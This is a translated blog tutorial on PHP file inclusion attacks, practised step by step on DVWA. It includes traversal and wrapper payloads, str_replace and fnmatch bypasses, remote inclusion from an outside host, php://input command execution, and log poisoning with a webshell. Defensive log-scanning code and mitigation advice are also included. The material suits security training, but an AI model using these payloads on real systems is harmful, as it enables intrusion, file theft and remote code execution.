Penetration testing: file inclusion vulnerabilities

File inclusion vulnerabilities:

Theory:

File inclusion: when writing a program, put the functions that are used repeatedly into a single file. Wherever those functions are needed, that file is called directly instead of writing the code again. This process of calling a file is called inclusion (include).

File inclusion vulnerabilities:
Developers want the code to be more flexible, so the name of the included file is put into a variable and called dynamically.
The file inclusion vulnerability arises when the function that introduces the file through that variable does not reasonably validate the incoming file name, so an unexpected file is operated on. This leads to unintended file disclosure and even malicious code injection.

File inclusion functions:
File inclusion functions in PHP:
include() only generates a warning when the included file is not found.
include_once() is similar to include(); the difference is that if the code in the file has already been included, it will not be included again.
require() generates a fatal error when the included file cannot be found, and the script stops running.
require_once() is similar to require(), except that if the code in the file has already been included, it will not be included again.

File inclusion functions provided by JSP/Servlet:
java.io.File()
java.io.FileReader()

File inclusion functions provided in ASP:
include file
include virtual

File inclusion vulnerability classification:
Local file inclusion: the included file is stored on the local server.

Remote file inclusion: the included file is stored on a third-party server. The condition is allow_url_fopen = on.

File inclusion vulnerability detection:
Page features that suggest an inclusion vulnerability:
?page=a.php
?home=b.html
?file=content
Classic test method:
?file=../../../etc/passwd
?page=file:///etc/passwd
?page=http://www.f_In.cn/1.php

Examples:

1. File inclusion vulnerability example 1 (Windows), low level

Enter dvwa and set the security level to low

Click on file inclusion to enter the test page

Append /etc/passwd to the URL address; from the returned page you can determine that the system is Windows and obtain the absolute path of the server's files.

Absolute path access:
append the following to the URL to read the PHP configuration file
D:\phpstudy\www\dvwa\php.ini

Relative path access:
enter the relative path of the file in the URL to read the PHP configuration file. The specific request is as follows,
where each ../ goes up one directory level, back towards the system root directory.
../../../../../phpstudy\www\dvwa\php.ini

To increase concealment, \phpstudy\www\dvwa\php.ini is encoded before it is accessed.

Remote file inclusion:
Create the file phpinfo.txt and place it on a third-party server:

<?php phpinfo() ?>

Enter the external link in the URL address to obtain the PHP configuration information
http://192.168.1.10/phpinfo.txt
where the IP address is that of the third-party server.

Encode http://192.168.1.10/phpinfo.txt before accessing it.

2. File inclusion vulnerability example 2 (Windows), medium level

Enter dvwa and set the security level to medium

Click on file inclusion to enter the test page

Append /etc/passwd to the URL address; from the returned page you can determine that the system is Windows and obtain the absolute path of the server's files, D:\phpstudy\www\dvwa

Absolute path access:
append the following to the URL to read the PHP configuration file
D:\phpstudy\www\dvwa\php.ini

Checking the source code shows that the server uses the str_replace() function to strip ../ ..\ http:// https://

For relative path access, use double writing to bypass it:
..././..././..././..././..././phpstudy/www/dvwa/php.ini

Remote file inclusion:
Create the file phpinfo.txt and place it on a third-party server:

<?php phpinfo() ?>

Enter the external link in the URL address, using double writing to bypass the replacement rule, to obtain the PHP configuration information
hthttp://tp://192.168.1.10/phpinfo.txt

3. File inclusion vulnerability example 3 (Windows), high level

Enter dvwa and set the security level to high

Click on file inclusion to enter the test page

Append /etc/passwd to the URL address; checking the result shows an error.

Looking at the source code, the server uses the fnmatch() function to check the page parameter: the page parameter must begin with file for the server to include the corresponding file.

Append file:///etc/passwd to the URL address and check the returned result: the system is Windows, and the web file path is found.

Absolute path access:
enter the following parameter in the address to read the PHP configuration file
file:///D:\phpstudy\www\dvwa\php.ini

Relative path access:
file:///..\phpstudy\www\dvwa\php.ini

4. File inclusion vulnerability example 4 (Linux), low level

The DVWA platform (Linux-based), security level low

Enter dvwa and set the security level to low

Click on file inclusion to enter the test page

Append /etc/passwd to the URL address, and obtain the passwd file of the system the platform runs on from the returned page.

Relative path access:
enter the relative path of the file in the URL to obtain the passwd file. The specific request is as follows,
where each ../ goes up one directory level, back towards the system root directory.
../../../../../etc/passwd

To increase concealment, /etc/passwd is encoded before it is accessed.

Remote file inclusion:
Create the file phpinfo.txt and place it on a third-party server:

<?php phpinfo() ?>

Enter the external link in the URL address to obtain the PHP configuration information
http://192.168.1.10/phpinfo.txt
where the IP address is that of the third-party server.

Encode http://192.168.1.10/phpinfo.txt before accessing it.

5. File inclusion vulnerability example 5 (Linux), medium level

Enter dvwa and set the security level to medium

Click on file inclusion to enter the test page

Looking at the source code, the server uses the str_replace() function to strip ../ ..\ http:// https://.
Append /etc/passwd to the URL address, and obtain the passwd file of the system the platform runs on from the returned page.

For relative path access, use double writing to bypass it:
..././..././..././..././..././etc/passwd

Remote file inclusion:
Create the file phpinfo.txt and place it on a third-party server:

<?php phpinfo() ?>

Enter the external link in the URL address, using double writing to bypass the replacement rule, to obtain the PHP configuration information
hthttp://tp://192.168.1.10/phpinfo.txt

6. File inclusion vulnerability example 6 (Linux), high level

Enter dvwa and set the security level to high

Click on file inclusion to enter the test page

Append /etc/passwd to the URL address; checking the result shows an error.

Looking at the source code, the server uses the fnmatch() function to check the page parameter: the page parameter must begin with file for the server to include the corresponding file.

Append file:///etc/passwd to the URL address, view the returned result, and obtain the passwd file of the system the platform runs on.

Relative path access:
file:///../../../../../etc/passwd

7. Middleware log inclusion bypass example:

When a PHP file has only a local inclusion vulnerability and no remote inclusion vulnerability, and normal files cannot be uploaded (there is no upload function), the inclusion vulnerability exists but cannot be exploited directly. In this case an attacker may use the Apache log files for the intrusion.

After the Apache server is running, two log files are generated: access.log (the access log) and error.log (the error log). The Apache log records our operations, that is, each request, and writes them into the access log access.log.

Experiment:
In DVWA, set the security level to low.
The goal is to write a one-line webshell (a "one-sentence Trojan") into the access log access.log.
Method: copy the one-line webshell from Chopper and append it to the URL address. After the request executes, the log records that line.
Although the request carrying the webshell returns an error, the one-line webshell has been recorded in the log.
At this point, simply include access.log through the local file inclusion to execute it.
Note that you can use ../ to adjust the directory.
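As a defender-side counterpart to the log technique above, here is an added example (not part of the original post or of DVWA) that scans Apache access.log lines for the inclusion indicators this page lists: ../ traversal, the file:// and php:// wrappers, remote URLs in the include parameter, and a PHP open tag sent in the URL. The log lines are constructed for the example, and the parameter names page, file and home are the ones the detection section lists.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request field of an Apache combined-format line: "GET /path?q=v HTTP/1.1".
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

INCLUDE_PARAMS = ("page", "file", "home")   # parameter names the page lists

# Substring indicators taken from the page. Searching the decoded value for
# the plain token means double-written forms such as "..././" and
# "hthttp://tp://" are still caught, because they contain the token itself.
INDICATORS = {"traversal": ("../", "..\\"), "file_wrapper": ("file://",),
              "php_wrapper": ("php://filter", "php://input"),
              "remote_url": ("http://", "https://")}

def classify_value(value: str) -> set:
    decoded = unquote(unquote(value)).lower()   # also undo double encoding
    return {n for n, toks in INDICATORS.items() if any(t in decoded for t in toks)}

def scan_line(line: str) -> list:
    """Indicator names for one access.log line; [] means nothing found."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = m.group("target")
    hits = set()
    # A PHP one-liner sent in the URL is stored verbatim in access.log.
    if "<?php" in unquote(unquote(target)).lower():
        hits.add("php_tag")
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name in INCLUDE_PARAMS:
        for value in query.get(name, []):
            hits |= classify_value(value)
    return sorted(hits)

def scan_log(text: str) -> list:
    """(line number, indicators) for every flagged line of a log file."""
    return [(i, hits) for i, line in enumerate(text.splitlines(), 1)
            if (hits := scan_line(line))]

# Constructed sample access.log lines for this example (not real traffic).
SAMPLE_LOG = """\
192.168.1.55 - - [10/Aug/2020:10:00:00 +0800] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.55 - - [10/Aug/2020:10:00:05 +0800] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.55 - - [10/Aug/2020:10:00:09 +0800] "GET /dvwa/vulnerabilities/fi/?page=..././..././etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.55 - - [10/Aug/2020:10:00:14 +0800] "GET /dvwa/vulnerabilities/fi/?page=hthttp://tp://192.168.1.10/phpinfo.txt HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
192.168.1.55 - - [10/Aug/2020:10:00:20 +0800] "GET /dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php HTTP/1.1" 200 700 "-" "Mozilla/5.0"
192.168.1.55 - - [10/Aug/2020:10:00:31 +0800] "GET /dvwa/?%3C%3Fphp%20phpinfo%28%29%3B%20%3F%3E HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""
```

Running scan_log(SAMPLE_LOG) flags lines 2 to 6 and leaves the benign include.php request alone; the same scan applied to the real access.log also shows whether a one-liner has already landed in the file that the section above proposes to include.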

8. PHP inclusion to read and write files

1. PHP inclusion to read files:

Experimental environment DVWA, security level low

The condition is that you know the name and path of the file.

Enable the proxy in the browser, open Burp, construct the URL in the browser and capture the request:
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php
This accesses the URL, adjusts the parameter of the filter, obtains the base64-encoded string through the php protocol (php://filter/read),
and then decodes it to get the contents of the PHP file.

2. PHP inclusion to write files:
construct the URL
http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://input

The POST data submitted through Burp is: <?php system('net user');?> This uses the PHP system() function to execute the net user command.
Many other functions that can execute commands can also be used here.

This can be used only when allow_url_include is on. If you want to see the echoed result, you must find php-apache2handler.ini under C:\php\php-5.2.14-Win32, open it, search for disable_functions=proc_open,popen,exec,system……, remove system and restart Apache.

Summary of file inclusion vulnerability bypass methods

1. Bypassing the str_replace function
Experimental environment: DVWA, security level medium.
Programmers use the str_replace function for defense. This function is extremely insecure, because the replacement rule can easily be bypassed with double writing,
e.g. page=hthttp://tp://192.168.0.103/phpinfo.txt: the str_replace function deletes http://, so the value becomes page=http://192.168.0.103/phpinfo.txt, and the remote command is successfully executed.

Note that because only "../" and "..\" are replaced, there is no restriction on including files via absolute paths.

Experiment:
1. Local file inclusion
http://192.168.0.103/dvwa/vulnerabilities/fi/?page=..././..././..././..././..././..././..././..././..././..././Xampp/htdocs/dvwa/php.ini
2. Absolute paths are not affected at all
http://192.168.0.103/dvwa/vulnerabilities/fi/?page=C:/xampp/htdocs/dvwa/php.ini
3. Remote file inclusion
http://192.168.0.103/dvwa/vulnerabilities/fi/?page=htthttp://p://192.168.5.12/phpinfo.txt

2. Include truncation bypass
Code analysis:
<?php
if (isset($_GET['page'])) {
    include $_GET['page'] . ".php";   // ".php" is appended to the parameter as a defense
} else {
    include 'home.php';
}
?>
The code checks whether the parameter is set. If it is, it includes the parameter value with ".php" appended as a defense; if not, it includes home.php. This bypass only applies when magic_quotes_gpc=off. If the PHP version is below 5.3.4 it can be bypassed by %00 truncation, but this is rarely seen now; for example: index.php?file=info.txt//…………(a certain amount of data)/.

3. Bypassing the fnmatch function
Code analysis:
if (!fnmatch("file*", $file) && $file != "include.php")
An error occurs when the file is neither "include.php" (including the include.php file) nor matches "file*" (a file name beginning with file); conversely, if the file name meets either of the two conditions, it is included.

At this point the first condition is difficult to exploit, so attention shifts to the second one:
page=file:///C:/xampp/htdocs/dvwa/php.ini satisfies "file*" (a file name beginning with file).

Construct the URL
http://192.168.0.103/dvwa/vulnerabilities/fi/?page=file:///C:/xampp/htdocs/dvwa/php.ini
and the server configuration file is successfully read
using the file:// protocol.

4. Impossible difficulty code analysis
if ($file != "include.php" && $file != "file1.php" && $file != "file2.php")

It uses a whitelist approach, stipulating that the parameter can only be one of the listed names, file1.php or file2.php.
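An added example in Python, not code from the original post or from DVWA, that models the three checks this summary describes as the page states them: the medium level's single-pass str_replace, the high level's fnmatch("file*") prefix test, and the impossible level's fixed allow-list (the allow-list names and the web root /var/www/dvwa are assumptions). The stays_in_root check is the kind of web-root containment test that the defense advice at the end of this page calls for; it shows that the values which survive the str_replace filter still resolve outside the web root.

```python
import fnmatch
import posixpath

# Medium level as the page describes it: one str_replace pass that strips
# "../", "..\", "http://" and "https://". Python's str.replace, like PHP's
# str_replace, removes non-overlapping matches in a single left-to-right
# pass, so "..././" collapses to "../" and "hthttp://tp://" to "http://".
def medium_filter(page: str) -> str:
    for token in ("http://", "https://", "../", "..\\"):
        page = page.replace(token, "")
    return page

# High level: fnmatch("file*") only inspects the prefix, so the file://
# wrapper satisfies it just as well as a file named file1.php does.
def high_filter_allows(page: str) -> bool:
    return fnmatch.fnmatch(page, "file*") or page == "include.php"

# Impossible level: a fixed allow-list (names assumed from the page).
ALLOWED = {"include.php", "file1.php", "file2.php"}

def whitelist_allows(page: str) -> bool:
    return page in ALLOWED

# Defender-side containment check: reject any value with ":" (URL schemes,
# PHP wrappers, Windows drive letters) or a backslash, then require the
# normalised path to stay under the web root (root path is assumed).
# posixpath is used so the result does not depend on the host OS.
def stays_in_root(page: str, root: str = "/var/www/dvwa") -> bool:
    if ":" in page or "\\" in page:
        return False
    full = posixpath.normpath(posixpath.join(root, page))
    return full == root or full.startswith(root + "/")

def check(page: str) -> dict:
    """Show how each check treats one raw page parameter value."""
    stripped = medium_filter(page)
    return {
        "medium_result": stripped,
        "medium_escapes_root": not stays_in_root(stripped),
        "high_allows": high_filter_allows(page),
        "whitelist_allows": whitelist_allows(page),
    }

if __name__ == "__main__":
    for value in ("file1.php", "..././..././..././etc/passwd",
                  "hthttp://tp://192.168.1.10/phpinfo.txt",
                  "file:///etc/passwd", "C:/xampp/htdocs/dvwa/php.ini"):
        print(value, "->", check(value))
```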

Exploitation

1. File inclusion vulnerability exploitation:
1. Commonly used exploitation methods for file inclusion:
reading sensitive information,
local inclusion combined with file upload,
using PHP wrapper protocols,
Apache log files,
remote inclusion to write a shell,
truncated inclusion.

2. Reading sensitive information
The commonly used method is to append the name of a file on the target host to the URL address. If the file exists on the target host and the user has the corresponding permissions, the content of the file can be read. Otherwise, you get a warning similar to open_basedir restriction in effect.

Common sensitive information file paths
Windows system
C:\boot.ini // view the system version
C:\windows\repair\sam // stores the password from the first installation of the Windows system
C:\program files\mysql\my.ini // stores the MySQL configuration
Linux system
/etc/passwd
/etc/local/app/apache2/conf/httpd.conf // Apache configuration file
/etc/my.cnf // MySQL configuration file

3. Local inclusion and file upload.
If the website provides a file upload function, a shell can still be obtained by combining it with the file inclusion vulnerability.

4. Remote inclusion to write a shell
The condition is allow_url_fopen=on

Write the shell.txt file on the remote server.
After the URL parameter, append the third-party server address and the file name shell.txt.

5. PHP wrapper protocols
Use php://filter to read the source code of PHP files
Use the php://input wrapper for code execution

6. Apache log file
The condition is that the current account has permission to read the log file.
Method: use packet-capture software to add malicious code to the URL, then use the file inclusion vulnerability to include the log file. Finding the Apache path is the key.

7. Truncated inclusion
Method: %00 (null)
Use the operating system's limit on the maximum directory length

If there is an image Trojan at this time,
enter http://www.f_i.cn/index.php?page=1.jpg%00

This method only applies when magic_quotes_gpc=off

File inclusion vulnerability defense

Strictly judge whether the included parameter is externally controllable.

Path restriction: restrict the included files to a specific folder, and prohibit directory traversal characters such as ../.

Include file verification: verify that the included file is a member of a whitelist.

Try not to use dynamic inclusion; the content can instead be written directly into the page that needs it.


Origin blog.csdn.net/weixin_45380284/article/details/108132429